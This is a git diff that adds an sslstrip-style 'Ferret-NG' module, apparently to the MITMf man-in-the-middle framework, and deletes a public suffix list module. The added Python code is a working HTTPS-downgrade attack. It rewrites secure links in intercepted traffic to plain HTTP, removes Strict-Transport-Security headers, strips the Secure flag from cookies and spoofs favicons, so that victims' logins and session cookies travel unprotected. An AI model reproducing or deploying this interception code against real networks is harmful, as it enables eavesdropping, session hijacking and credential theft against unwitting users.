index 0000000..f0cc638 --- /dev/null +++ b/core/ferretNG/DnsCache.py @@ -0,0 +1,49 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging + +mitmf_logger = logging.getLogger('mitmf') + +class DnsCache: + + ''' + The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 
+ ''' + + _instance = None + + def __init__(self): + self.customAddress = None + self.cache = {} + + @staticmethod + def getInstance(): + if DnsCache._instance == None: + DnsCache._instance = DnsCache() + + return DnsCache._instance + + def cacheResolution(self, host, address): + self.cache[host] = address + + def getCachedAddress(self, host): + if host in self.cache: + return self.cache[host] + + return None diff --git a/core/ferretNG/FerretProxy.py b/core/ferretNG/FerretProxy.py new file mode 100644 index 0000000..d95f786 --- /dev/null +++ b/core/ferretNG/FerretProxy.py @@ -0,0 +1,24 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from twisted.web.http import HTTPChannel +from ClientRequest import ClientRequest + +class FerretProxy(HTTPChannel): + + requestFactory = ClientRequest diff --git a/core/ferretNG/SSLServerConnection.py b/core/ferretNG/SSLServerConnection.py new file mode 100644 index 0000000..8ba8007 --- /dev/null +++ b/core/ferretNG/SSLServerConnection.py @@ -0,0 +1,110 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging, re, string + +from ServerConnection import ServerConnection +from URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger('mitmf') + +class SSLServerConnection(ServerConnection): + + ''' + For SSL connections to a server, we need to do some additional stripping. First we need + to make note of any relative links, as the server will be expecting those to be requested + via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 
+ ''' + + cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) + cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) + iconExpression = re.compile(r"", re.IGNORECASE) + linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) + headExpression = re.compile(r"", re.IGNORECASE) + + def __init__(self, command, uri, postData, headers, client): + ServerConnection.__init__(self, command, uri, postData, headers, client) + self.urlMonitor = URLMonitor.getInstance() + + def getLogLevel(self): + return logging.INFO + + def getPostPrefix(self): + return "SECURE POST" + + def handleHeader(self, key, value): + if (key.lower() == 'set-cookie'): + value = SSLServerConnection.cookieExpression.sub("\g<1>", value) + + ServerConnection.handleHeader(self, key, value) + + def stripFileFromPath(self, path): + (strippedPath, lastSlash, file) = path.rpartition('/') + return strippedPath + + def buildAbsoluteLink(self, link): + absoluteLink = "" + + if ((not link.startswith('http')) and (not link.startswith('/'))): + absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link + + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link) + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink) + elif not link.startswith('http'): + absoluteLink = "http://"+self.headers['host']+link + + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link) + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink) + + if not absoluteLink == "": + absoluteLink = absoluteLink.replace('&', '&') + self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); + + def replaceCssLinks(self, data): + iterator = re.finditer(SSLServerConnection.cssExpression, data) + + for match in iterator: + self.buildAbsoluteLink(match.group(1)) + + return data + + def replaceFavicon(self, data): + match = re.search(SSLServerConnection.iconExpression, data) + + if (match != None): + data = re.sub(SSLServerConnection.iconExpression, + "", data) + else: + data = re.sub(SSLServerConnection.headExpression, + "", data) + + return data + + def replaceSecureLinks(self, data): + data = ServerConnection.replaceSecureLinks(self, data) + data = self.replaceCssLinks(data) + + if (self.urlMonitor.isFaviconSpoofing()): + data = self.replaceFavicon(data) + + iterator = re.finditer(SSLServerConnection.linkExpression, data) + + for match in iterator: + self.buildAbsoluteLink(match.group(10)) + + return data diff --git a/core/ferretNG/ServerConnection.py b/core/ferretNG/ServerConnection.py new file mode 100644 index 0000000..e1e04ef --- /dev/null +++ b/core/ferretNG/ServerConnection.py @@ -0,0 +1,193 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import re +import string +import random +import zlib +import gzip +import StringIO +import sys + +from twisted.web.http import HTTPClient +from URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger('mitmf') + +class ServerConnection(HTTPClient): + + ''' The server connection is where we do the bulk of the stripping. Everything that + comes back is examined. The headers we dont like are removed, and the links are stripped + from HTTPS to HTTP. + ''' + + urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) + urlType = re.compile(r"https://", re.IGNORECASE) + urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlTypewww = re.compile(r"https://www", re.IGNORECASE) + urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) + urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) + #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) + + def __init__(self, command, uri, postData, headers, client): + + self.command = command + self.uri = uri + self.postData = postData + self.headers = headers + self.client = client + self.clientInfo = None + self.urlMonitor = URLMonitor.getInstance() + self.isImageRequest = False + self.isCompressed = False + self.contentLength = None + self.shutdownComplete = False + + def getPostPrefix(self): + return "POST" + + def sendRequest(self): + if self.command == 'GET': + + mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host'])) + + self.sendCommand(self.command, self.uri) + + def sendHeaders(self): + for header, value in self.headers.iteritems(): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value)) + self.sendHeader(header, value) + + self.endHeaders() + + def sendPostData(self): + + self.transport.write(self.postData) + + def connectionMade(self): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.") + self.sendRequest() + self.sendHeaders() + + if (self.command == 'POST'): + self.sendPostData() + + def handleStatus(self, version, code, message): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message)) + self.client.setResponseCode(int(code), message) + + def handleHeader(self, key, value): + if (key.lower() == 'location'): + value = self.replaceSecureLinks(value) + + if (key.lower() == 'content-type'): + if (value.find('image') != -1): + self.isImageRequest = True + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning") + + if (key.lower() == 'content-encoding'): + if (value.find('gzip') != -1): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed") + self.isCompressed = True + + elif (key.lower()== 'strict-transport-security'): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header") + + elif (key.lower() == 'content-length'): + self.contentLength = value + + elif (key.lower() == 'set-cookie'): + self.client.responseHeaders.addRawHeader(key, value) + + else: + self.client.setHeader(key, value) + + def handleEndHeaders(self): + if 
(self.isImageRequest and self.contentLength != None): + self.client.setHeader("Content-Length", self.contentLength) + + if self.length == 0: + self.shutdown() + + if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": + for header, value in self.client.headers.iteritems(): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value)) + + def handleResponsePart(self, data): + if (self.isImageRequest): + self.client.write(data) + else: + HTTPClient.handleResponsePart(self, data) + + def handleResponseEnd(self): + if (self.isImageRequest): + self.shutdown() + else: + try: + HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors + except: + pass + + def handleResponse(self, data): + if (self.isCompressed): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...") + data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() + + data = self.replaceSecureLinks(data) + + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data))) + + if (self.contentLength != None): + self.client.setHeader('Content-Length', len(data)) + + try: + self.client.write(data) + except: + pass + + try: + self.shutdown() + except: + mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.") + + def replaceSecureLinks(self, data): + + iterator = re.finditer(ServerConnection.urlExpression, data) + + for match in iterator: + url = match.group() + + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url) + + url = url.replace('https://', 'http://', 1) + url = url.replace('&', '&') + self.urlMonitor.addSecureLink(self.client.getClientIP(), url) + + data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) + return re.sub(ServerConnection.urlType, 'http://', data) + + def shutdown(self): + if not self.shutdownComplete: + self.shutdownComplete = True + try: + self.client.finish() + self.transport.loseConnection() + except: + pass diff --git a/core/ferretNG/ServerConnectionFactory.py b/core/ferretNG/ServerConnectionFactory.py new file mode 100644 index 0000000..a64c800 --- /dev/null +++ b/core/ferretNG/ServerConnectionFactory.py @@ -0,0 +1,48 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +from twisted.internet.protocol import ClientFactory + +mitmf_logger = logging.getLogger('mimtf') + +class ServerConnectionFactory(ClientFactory): + + def __init__(self, command, uri, postData, headers, client): + self.command = command + self.uri = uri + self.postData = postData + self.headers = headers + self.client = client + + def buildProtocol(self, addr): + return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) + + def clientConnectionFailed(self, connector, reason): + mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.") + + destination = connector.getDestination() + + if (destination.port != 443): + mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL") + self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) + else: + try: + self.client.finish() + except: + pass diff --git a/core/ferretNG/URLMonitor.py b/core/ferretNG/URLMonitor.py new file mode 100644 index 0000000..d1381aa --- /dev/null +++ b/core/ferretNG/URLMonitor.py @@ -0,0 +1,85 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import re +import os +import logging + +mitmf_logger = logging.getLogger('mimtf') + +class URLMonitor: + + ''' + The URL monitor maintains a set of (client, url) tuples that correspond to requests which the + server is expecting over SSL. It also keeps track of secure favicon urls. + ''' + + # Start the arms race, and end up here... 
+ javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] + cookies = dict() + _instance = None + + def __init__(self): + self.strippedURLs = set() + self.strippedURLPorts = dict() + + @staticmethod + def getInstance(): + if URLMonitor._instance == None: + URLMonitor._instance = URLMonitor() + + return URLMonitor._instance + + def isSecureLink(self, client, url): + for expression in URLMonitor.javascriptTrickery: + if (re.match(expression, url)): + return True + + return (client,url) in self.strippedURLs + + def getSecurePort(self, client, url): + if (client,url) in self.strippedURLs: + return self.strippedURLPorts[(client,url)] + else: + return 443 + + def addSecureLink(self, client, url): + methodIndex = url.find("//") + 2 + method = url[0:methodIndex] + + pathIndex = url.find("/", methodIndex) + if pathIndex is -1: + pathIndex = len(url) + url += "/" + + host = url[methodIndex:pathIndex].lower() + path = url[pathIndex:] + + port = 443 + portIndex = host.find(":") + + if (portIndex != -1): + host = host[0:portIndex] + port = host[portIndex+1:] + if len(port) == 0: + port = 443 + + url = method + host + path + + self.strippedURLs.add((client, url)) + self.strippedURLPorts[(client, url)] = int(port) diff --git a/core/publicsuffix/__init__.py b/core/ferretNG/__init__.py similarity index 100% rename from core/publicsuffix/__init__.py rename to core/ferretNG/__init__.py diff --git a/core/publicsuffix/publicsuffix.py b/core/publicsuffix/publicsuffix.py deleted file mode 100644 index 5488ab2..0000000 --- a/core/publicsuffix/publicsuffix.py +++ /dev/null @@ -1,106 +0,0 @@ -"""Public Suffix List module for Python. -""" - -import codecs -import os.path - -class PublicSuffixList(object): - def __init__(self, input_file=None): - """Reads and parses public suffix list. - - input_file is a file object or another iterable that returns - lines of a public suffix list file. If input_file is None, an - UTF-8 encoded file named "publicsuffix.txt" in the same - directory as this Python module is used. 
- - The file format is described at http://publicsuffix.org/list/ - """ - - if input_file is None: - input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt') - input_file = codecs.open(input_path, "r", "utf8") - - root = self._build_structure(input_file) - self.root = self._simplify(root) - - def _find_node(self, parent, parts): - if not parts: - return parent - - if len(parent) == 1: - parent.append({}) - - assert len(parent) == 2 - negate, children = parent - - child = parts.pop() - - child_node = children.get(child, None) - - if not child_node: - children[child] = child_node = [0] - - return self._find_node(child_node, parts) - - def _add_rule(self, root, rule): - if rule.startswith('!'): - negate = 1 - rule = rule[1:] - else: - negate = 0 - - parts = rule.split('.') - self._find_node(root, parts)[0] = negate - - def _simplify(self, node): - if len(node) == 1: - return node[0] - - return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items())) - - def _build_structure(self, fp): - root = [0] - - for line in fp: - line = line.strip() - if line.startswith('//') or not line: - continue - - self._add_rule(root, line.split()[0].lstrip('.')) - - return root - - def _lookup_node(self, matches, depth, parent, parts): - if parent in (0, 1): - negate = parent - children = None - else: - negate, children = parent - - matches[-depth] = negate - - if depth < len(parts) and children: - for name in ('*', parts[-depth]): - child = children.get(name, None) - if child is not None: - self._lookup_node(matches, depth+1, child, parts) - - def get_public_suffix(self, domain): - """get_public_suffix("www.example.com") -> "example.com" - - Calling this function with a DNS name will return the - public suffix for that name. - - Note that for internationalized domains the list at - http://publicsuffix.org uses decoded names, so it is - up to the caller to decode any Punycode-encoded names. - """ - - parts = domain.lower().lstrip('.').split('.') - hits = [None] * len(parts) - - self._lookup_node(hits, 1, self.root, parts) - - for i, what in enumerate(hits): - if what is not None and what == 0: - return '.'.join(parts[i:]) diff --git a/core/publicsuffix/publicsuffix.txt b/core/publicsuffix/publicsuffix.txt deleted file mode 100644 index 87b2f33..0000000 --- a/core/publicsuffix/publicsuffix.txt +++ /dev/null @@ -1,4909 +0,0 @@ -// ***** BEGIN LICENSE BLOCK ***** -// Version: MPL 1.1/GPL 2.0/LGPL 2.1 -// -// The contents of this file are subject to the Mozilla Public License Version -// 1.1 (the "License"); you may not use this file except in compliance with -// the License. You may obtain a copy of the License at -// http://www.mozilla.org/MPL/ -// -// Software distributed under the License is distributed on an "AS IS" basis, -// WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License -// for the specific language governing rights and limitations under the -// License. -// -// The Original Code is the Public Suffix List. -// -// The Initial Developer of the Original Code is -// Jo Hermans . -// Portions created by the Initial Developer are Copyright (C) 2007 -// the Initial Developer. All Rights Reserved. 
-// -// Contributor(s): -// Ruben Arakelyan -// Gervase Markham -// Pamela Greene -// David Triendl -// Jothan Frakes -// The kind representatives of many TLD registries -// -// Alternatively, the contents of this file may be used under the terms of -// either the GNU General Public License Version 2 or later (the "GPL"), or -// the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), -// in which case the provisions of the GPL or the LGPL are applicable instead -// of those above. If you wish to allow use of your version of this file only -// under the terms of either the GPL or the LGPL, and not to allow others to -// use your version of this file under the terms of the MPL, indicate your -// decision by deleting the provisions above and replace them with the notice -// and other provisions required by the GPL or the LGPL. If you do not delete -// the provisions above, a recipient may use your version of this file under -// the terms of any one of the MPL, the GPL or the LGPL. -// -// ***** END LICENSE BLOCK ***** - -// ac : http://en.wikipedia.org/wiki/.ac -ac -com.ac -edu.ac -gov.ac -net.ac -mil.ac -org.ac - -// ad : http://en.wikipedia.org/wiki/.ad -ad -nom.ad - -// ae : http://en.wikipedia.org/wiki/.ae -// see also: "Domain Name Eligibility Policy" at http://www.aeda.ae/eng/aepolicy.php -ae -co.ae -net.ae -org.ae -sch.ae -ac.ae -gov.ae -mil.ae - -// aero : see http://www.information.aero/index.php?id=66 -aero -accident-investigation.aero -accident-prevention.aero -aerobatic.aero -aeroclub.aero -aerodrome.aero -agents.aero -aircraft.aero -airline.aero -airport.aero -air-surveillance.aero -airtraffic.aero -air-traffic-control.aero -ambulance.aero -amusement.aero -association.aero -author.aero -ballooning.aero -broker.aero -caa.aero -cargo.aero -catering.aero -certification.aero -championship.aero -charter.aero -civilaviation.aero -club.aero -conference.aero -consultant.aero -consulting.aero -control.aero -council.aero -crew.aero -design.aero -dgca.aero -educator.aero -emergency.aero -engine.aero -engineer.aero -entertainment.aero -equipment.aero -exchange.aero -express.aero -federation.aero -flight.aero -freight.aero -fuel.aero -gliding.aero -government.aero -groundhandling.aero -group.aero -hanggliding.aero -homebuilt.aero -insurance.aero -journal.aero -journalist.aero -leasing.aero -logistics.aero -magazine.aero -maintenance.aero -marketplace.aero -media.aero -microlight.aero -modelling.aero -navigation.aero -parachuting.aero -paragliding.aero -passenger-association.aero -pilot.aero -press.aero -production.aero -recreation.aero -repbody.aero -res.aero -research.aero -rotorcraft.aero -safety.aero -scientist.aero -services.aero -show.aero -skydiving.aero -software.aero -student.aero -taxi.aero -trader.aero -trading.aero -trainer.aero -union.aero -workinggroup.aero -works.aero - -// af : http://www.nic.af/help.jsp -af -gov.af -com.af -org.af -net.af -edu.af - -// ag : http://www.nic.ag/prices.htm -ag -com.ag -org.ag -net.ag -co.ag -nom.ag - -// ai : http://nic.com.ai/ -ai -off.ai -com.ai -net.ai -org.ai - -// al : http://www.ert.gov.al/ert_alb/faq_det.html?Id=31 -al -com.al -edu.al -gov.al -mil.al -net.al -org.al - -// am : http://en.wikipedia.org/wiki/.am -am - -// an : http://www.una.an/an_domreg/default.asp -an -com.an -net.an -org.an -edu.an - -// ao : http://en.wikipedia.org/wiki/.ao -// http://www.dns.ao/REGISTR.DOC -ao -ed.ao -gv.ao -og.ao -co.ao -pb.ao -it.ao - -// aq : http://en.wikipedia.org/wiki/.aq -aq - -// ar : http://en.wikipedia.org/wiki/.ar -*.ar 
-!congresodelalengua3.ar -!educ.ar -!gobiernoelectronico.ar -!mecon.ar -!nacion.ar -!nic.ar -!promocion.ar -!retina.ar -!uba.ar - -// arpa : http://en.wikipedia.org/wiki/.arpa -// Confirmed by registry 2008-06-18 -e164.arpa -in-addr.arpa -ip6.arpa -iris.arpa -uri.arpa -urn.arpa - -// as : http://en.wikipedia.org/wiki/.as -as -gov.as - -// asia: http://en.wikipedia.org/wiki/.asia -asia - -// at : http://en.wikipedia.org/wiki/.at -// Confirmed by registry 2008-06-17 -at -ac.at -co.at -gv.at -or.at - -// http://www.info.at/ -biz.at -info.at - -// priv.at : http://www.nic.priv.at/ -// Submitted by registry 2008-06-09 -priv.at - -// au : http://en.wikipedia.org/wiki/.au -*.au -// au geographical names (vic.au etc... are covered above) -act.edu.au -nsw.edu.au -nt.edu.au -qld.edu.au -sa.edu.au -tas.edu.au -vic.edu.au -wa.edu.au -act.gov.au -// Removed at request of Shae.Donelan@services.nsw.gov.au, 2010-03-04 -// nsw.gov.au -nt.gov.au -qld.gov.au -sa.gov.au -tas.gov.au -vic.gov.au -wa.gov.au -// CGDNs - http://www.aucd.org.au/ -act.au -nsw.au -nt.au -qld.au -sa.au -tas.au -vic.au -wa.au - -// aw : http://en.wikipedia.org/wiki/.aw -aw -com.aw - -// ax : http://en.wikipedia.org/wiki/.ax -ax - -// az : http://en.wikipedia.org/wiki/.az -az -com.az -net.az -int.az -gov.az -org.az -edu.az -info.az -pp.az -mil.az -name.az -pro.az -biz.az - -// ba : http://en.wikipedia.org/wiki/.ba -ba -org.ba -net.ba -edu.ba -gov.ba -mil.ba -unsa.ba -unbi.ba -co.ba -com.ba -rs.ba - -// bb : http://en.wikipedia.org/wiki/.bb -bb -biz.bb -com.bb -edu.bb -gov.bb -info.bb -net.bb -org.bb -store.bb - -// bd : http://en.wikipedia.org/wiki/.bd -*.bd - -// be : http://en.wikipedia.org/wiki/.be -// Confirmed by registry 2008-06-08 -be -ac.be - -// bf : http://en.wikipedia.org/wiki/.bf -bf -gov.bf - -// bg : http://en.wikipedia.org/wiki/.bg -// https://www.register.bg/user/static/rules/en/index.html -bg -a.bg -b.bg -c.bg -d.bg -e.bg -f.bg -g.bg -h.bg -i.bg -j.bg -k.bg -l.bg -m.bg -n.bg -o.bg -p.bg -q.bg -r.bg -s.bg -t.bg -u.bg -v.bg -w.bg -x.bg -y.bg -z.bg -0.bg -1.bg -2.bg -3.bg -4.bg -5.bg -6.bg -7.bg -8.bg -9.bg - -// bh : http://en.wikipedia.org/wiki/.bh -bh -com.bh -edu.bh -net.bh -org.bh -gov.bh - -// bi : http://en.wikipedia.org/wiki/.bi -// http://whois.nic.bi/ -bi -co.bi -com.bi -edu.bi -or.bi -org.bi - -// biz : http://en.wikipedia.org/wiki/.biz -biz - -// bj : http://en.wikipedia.org/wiki/.bj -bj -asso.bj -barreau.bj -gouv.bj - -// bm : http://www.bermudanic.bm/dnr-text.txt -bm -com.bm -edu.bm -gov.bm -net.bm -org.bm - -// bn : http://en.wikipedia.org/wiki/.bn -*.bn - -// bo : http://www.nic.bo/ -bo -com.bo -edu.bo -gov.bo -gob.bo -int.bo -org.bo -net.bo -mil.bo -tv.bo - -// br : http://registro.br/dominio/dpn.html -// Updated by registry 2011-03-01 -br -adm.br -adv.br -agr.br -am.br -arq.br -art.br -ato.br -b.br -bio.br -blog.br -bmd.br -can.br -cim.br -cng.br -cnt.br -com.br -coop.br -ecn.br -edu.br -emp.br -eng.br -esp.br -etc.br -eti.br -far.br -flog.br -fm.br -fnd.br -fot.br -fst.br -g12.br -ggf.br -gov.br -imb.br -ind.br -inf.br -jor.br -jus.br -lel.br -mat.br -med.br -mil.br -mus.br -net.br -nom.br -not.br -ntr.br -odo.br -org.br -ppg.br -pro.br -psc.br -psi.br -qsl.br -radio.br -rec.br -slg.br -srv.br -taxi.br -teo.br -tmp.br -trd.br -tur.br -tv.br -vet.br -vlog.br -wiki.br -zlg.br - -// bs : http://www.nic.bs/rules.html -bs -com.bs -net.bs -org.bs -edu.bs -gov.bs - -// bt : http://en.wikipedia.org/wiki/.bt -bt -com.bt -edu.bt -gov.bt -net.bt -org.bt - -// bv : No registrations at this time. 
-// Submitted by registry 2006-06-16 - -// bw : http://en.wikipedia.org/wiki/.bw -// http://www.gobin.info/domainname/bw.doc -// list of other 2nd level tlds ? -bw -co.bw -org.bw - -// by : http://en.wikipedia.org/wiki/.by -// http://tld.by/rules_2006_en.html -// list of other 2nd level tlds ? -by -gov.by -mil.by -// Official information does not indicate that com.by is a reserved -// second-level domain, but it's being used as one (see www.google.com.by and -// www.yahoo.com.by, for example), so we list it here for safety's sake. -com.by - -// http://hoster.by/ -of.by - -// bz : http://en.wikipedia.org/wiki/.bz -// http://www.belizenic.bz/ -bz -com.bz -net.bz -org.bz -edu.bz -gov.bz - -// ca : http://en.wikipedia.org/wiki/.ca -ca -// ca geographical names -ab.ca -bc.ca -mb.ca -nb.ca -nf.ca -nl.ca -ns.ca -nt.ca -nu.ca -on.ca -pe.ca -qc.ca -sk.ca -yk.ca -// gc.ca: http://en.wikipedia.org/wiki/.gc.ca -// see also: http://registry.gc.ca/en/SubdomainFAQ -gc.ca - -// cat : http://en.wikipedia.org/wiki/.cat -cat - -// cc : http://en.wikipedia.org/wiki/.cc -cc - -// cd : http://en.wikipedia.org/wiki/.cd -// see also: https://www.nic.cd/domain/insertDomain_2.jsp?act=1 -cd -gov.cd - -// cf : http://en.wikipedia.org/wiki/.cf -cf - -// cg : http://en.wikipedia.org/wiki/.cg -cg - -// ch : http://en.wikipedia.org/wiki/.ch -ch - -// ci : http://en.wikipedia.org/wiki/.ci -// http://www.nic.ci/index.php?page=charte -ci -org.ci -or.ci -com.ci -co.ci -edu.ci -ed.ci -ac.ci -net.ci -go.ci -asso.ci -aéroport.ci -int.ci -presse.ci -md.ci -gouv.ci - -// ck : http://en.wikipedia.org/wiki/.ck -*.ck - -// cl : http://en.wikipedia.org/wiki/.cl -cl -gov.cl -gob.cl - -// cm : http://en.wikipedia.org/wiki/.cm -cm -gov.cm - -// cn : http://en.wikipedia.org/wiki/.cn -// Submitted by registry 2008-06-11 -cn -ac.cn -com.cn -edu.cn -gov.cn -net.cn -org.cn -mil.cn -公司.cn -网络.cn -網絡.cn -// cn geographic names -ah.cn -bj.cn -cq.cn -fj.cn -gd.cn -gs.cn -gz.cn -gx.cn -ha.cn -hb.cn -he.cn -hi.cn -hl.cn -hn.cn -jl.cn -js.cn -jx.cn -ln.cn -nm.cn -nx.cn -qh.cn -sc.cn -sd.cn -sh.cn -sn.cn -sx.cn -tj.cn -xj.cn -xz.cn -yn.cn -zj.cn -hk.cn -mo.cn -tw.cn - -// co : http://en.wikipedia.org/wiki/.co -// Submitted by registry 2008-06-11 -co -arts.co -com.co -edu.co -firm.co -gov.co -info.co -int.co -mil.co -net.co -nom.co -org.co -rec.co -web.co - -// com : http://en.wikipedia.org/wiki/.com -com - -// CentralNic names : http://www.centralnic.com/names/domains -// Confirmed by registry 2008-06-09 -ar.com -br.com -cn.com -de.com -eu.com -gb.com -hu.com -jpn.com -kr.com -no.com -qc.com -ru.com -sa.com -se.com -uk.com -us.com -uy.com -za.com - -// Requested by Yngve Pettersen 2009-11-26 -operaunite.com - -// Requested by Eduardo Vela 2010-09-06 -appspot.com - -// coop : http://en.wikipedia.org/wiki/.coop -coop - -// cr : http://www.nic.cr/niccr_publico/showRegistroDominiosScreen.do -cr -ac.cr -co.cr -ed.cr -fi.cr -go.cr -or.cr -sa.cr - -// cu : http://en.wikipedia.org/wiki/.cu -cu -com.cu -edu.cu -org.cu -net.cu -gov.cu -inf.cu - -// cv : http://en.wikipedia.org/wiki/.cv -cv - -// cx : http://en.wikipedia.org/wiki/.cx -// list of other 2nd level tlds ? 
